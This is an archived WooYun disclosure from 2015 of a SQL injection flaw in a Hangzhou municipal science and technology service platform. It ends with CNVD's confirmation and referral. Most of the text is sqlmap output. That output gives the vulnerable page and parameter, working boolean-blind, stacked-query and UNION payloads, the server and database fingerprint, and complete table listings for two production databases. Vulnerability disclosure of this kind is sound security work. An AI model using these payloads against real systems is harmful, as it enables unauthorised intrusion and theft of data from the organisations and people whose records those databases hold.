乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-29: 细节已通知厂商并且等待厂商处理中 2015-10-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-12: 细节向核心白帽子及相关领域专家公开 2015-10-22: 细节向普通白帽子公开 2015-11-01: 细节向实习白帽子公开 2015-11-16: 细节向公众公开
SQL注入
杭州市科技创新综合服务网络平台注入点:http://**.**.**.**/webhall/NewsDatail3.aspx?Id=198231
sqlmap resumed the following injection point(s) from stored session:---Parameter: Id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Id=198231 AND 3090=3090 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Id=198231;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Id=-3887 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(66)+CHAR(87)+CHAR(122)+CHAR(86)+CHAR(99)+CHAR(73)+CHAR(87)+CHAR(109)+CHAR(73)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- ---[20:48:19] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[20:48:19] [INFO] fetching tables for database: techPlantform[20:48:19] [INFO] the SQL query used returns 104 entriesDatabase: techPlantform[104 tables]+--------------------------------+| Expert_Notice || GetMessage || HomePageFlash || Online_Consult || ShinyPortal_Information || Shiny_Portal || Shiny_Security || StatisticsWZContent || StatisticsWZContent || StatisticsWZStaff || StatisticsWZanswer || StatisticsWZquestion || StatisticsWZtypecontent || T_DirectoryCategory || T_Frm_Item || T_Frm_TempInfo || T_HolidayDate || T_HolidayWeekend || T_InformationBulletin || T_InformationKeyWord || T_InnovativeServices || T_LOGINLOG || T_NewsStatus || T_OrderInfo || T_Resources || T_SYS_MENUROLE_USER || T_SYS_MENU_RIGHT || T_SYS_MENU_ROLE || T_SYS_MNEU || T_SYS_RIGHT_ROLE || T_TechAchievement_Pic || T_TechAchievement_Pic || T_TechBuildingCorp || T_TechBuildingCorp || T_TechProblems || T_USER_USERPOSITION || T_User_ClickCount || T_WF_FinishedWFID || T_WF_ID || T_WF_LOG || T_WF_OBJECTFILE || T_WF_TEMPLATE || T_WF_TMPLNODE || T_WF_TMPLNODERELATION || T_WF_WORKFLOW || T_WF_WORKNODE || T_WF_WORKNODERELATION || T_WF_WORKOBJECT || T_WORK_SCHEME || V_DirectoryInformationMenuName || V_InformationList || V_InformationalAuditing || errorlog || note_timing || t_District || t_Post || t_bank || t_cmp_attestation || t_cmp_bearpalm || t_cmp_itemtakeon || t_cmp_patent || t_cmp_porduce || t_cmp_productionvalue || t_corporation || t_department || t_engage_group || t_expert_BizOpen || t_expert_bak || t_expert_bak || t_expert_disquisition || t_expert_grade || t_expert_harvist || t_expert_skilldetall || t_expert_subject || t_grade_detall || t_grade_model || t_idlist || t_item_expertdetail || t_item_expertdetail || t_item_grade || t_operate || t_plantype_expert || t_selectinfo || t_sys_Nodes || t_sys_attachment || t_sys_columns || t_sys_data || t_sys_datatype || t_sys_group || t_sys_role_User || t_user_bak || t_user_bak || t_year_group || t_year_plantype || t_year_type || v_expert_grade || v_gettablelist || v_item_expert_accpnotice || v_item_expert_noticeNew || v_item_expert_noticeNew || v_plantype_expert || v_wf_nodestat || 流程表 || 短信发送历史表 |+--------------------------------+
sqlmap resumed the following injection point(s) from stored session:---Parameter: Id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: Id=198231 AND 3090=3090 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Id=198231;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: Id=-3887 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(110)+CHAR(66)+CHAR(87)+CHAR(122)+CHAR(86)+CHAR(99)+CHAR(73)+CHAR(87)+CHAR(109)+CHAR(73)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(118)+CHAR(113),NULL,NULL,NULL-- ---[20:59:58] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[20:59:58] [INFO] fetching tables for database: ShinyPortal_KeJiWang[20:59:58] [INFO] the SQL query used returns 105 entriesDatabase: ShinyPortal_KeJiWang[105 tables]+--------------------------------+| COM_SmsIn_97 || COM_SmsSent_97 || D99_CMD || MyZj || NetLoctiom || Sheet1$ || Shiny_CatalogList_AllCatalogs || Shiny_CatalogList_AllCatalogs || Shiny_CatalogNavigation || Shiny_CommunicBook || Shiny_Container || Shiny_Container || Shiny_CurrentUser || Shiny_DeptList || Shiny_DownLoadFileDetails || Shiny_DownLoadFileList_AllCata || Shiny_DownLoadFileList_AllCata || Shiny_FloatImg || Shiny_GetVisits || Shiny_Html || Shiny_ImageSwitch || Shiny_JyXcNew || Shiny_JyXcNew || Shiny_KjInformation || Shiny_Links || Shiny_Module || Shiny_ModuleSettings || Shiny_MotionMenu || Shiny_MyZj || Shiny_NewlistBG || Shiny_NewsContentNoCopy || Shiny_NewsContentNoCopy || Shiny_NewsList_AllNews || Shiny_NewsList_AllNews || Shiny_NewsPhoto || Shiny_Page || Shiny_Portal || Shiny_Redirect || Shiny_Search || Shiny_SearchSelectCont || Shiny_SearchSlectAll || Shiny_Security || Shiny_SendEmail || Shiny_SiteMenu || Shiny_SiteNavigation || Shiny_SlideImageBH || Shiny_Socent || Shiny_SpecialSubject || Shiny_StatisticsWZIP || Shiny_StatisticsWZcontext || Shiny_StatisticsWZcontext || Shiny_TitleloginBDIP || Shiny_TitleloginBDIP || Shiny_TitleloginBDURL || Shiny_TsZx || Shiny_UserLogin || Shiny_Video || Shiny_WorkSchedule || Shiny_Wsdc2 || Shiny_Wsdc2 || Shiny_XjCx || Shiny_Ysqgk || Shiny_fwtj || Shiny_zhuanlan || Socent || StatisticsWZContent || StatisticsWZContent || StatisticsWZStaff || StatisticsWZanswer || StatisticsWZquestion || StatisticsWZtypecontent || T_CountManage || T_DirectoryCategory || T_FriendlyLinkManage || T_ImageManage || T_InformationBulletin || T_Log || T_MemberUnitManage || T_PersonnelGroup || T_UserReply || T_VideosManage || T_WebSiteLinkManage || T_WebSiteLinkType || Talented || Tbl_Smreceived || Tbl_Smtosend || V_DirectoryInformationMenuName || V_InformationList || V_InformationalAuditing || jyxc || lm || news || sysdiagrams || 人员表 || 公司机构表 || 基本信息 || 岗位表 || 政务公开栏目 || 短信人员对应表 || 系统菜单表1 || 群组人员对应表 || 角色人员对应表 || 角色权限对应表1 || 角色表 || 部门表 |+--------------------------------+
联系网站的制作商
危害等级:中
漏洞Rank:9
确认时间:2015-10-02 09:04
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置。
暂无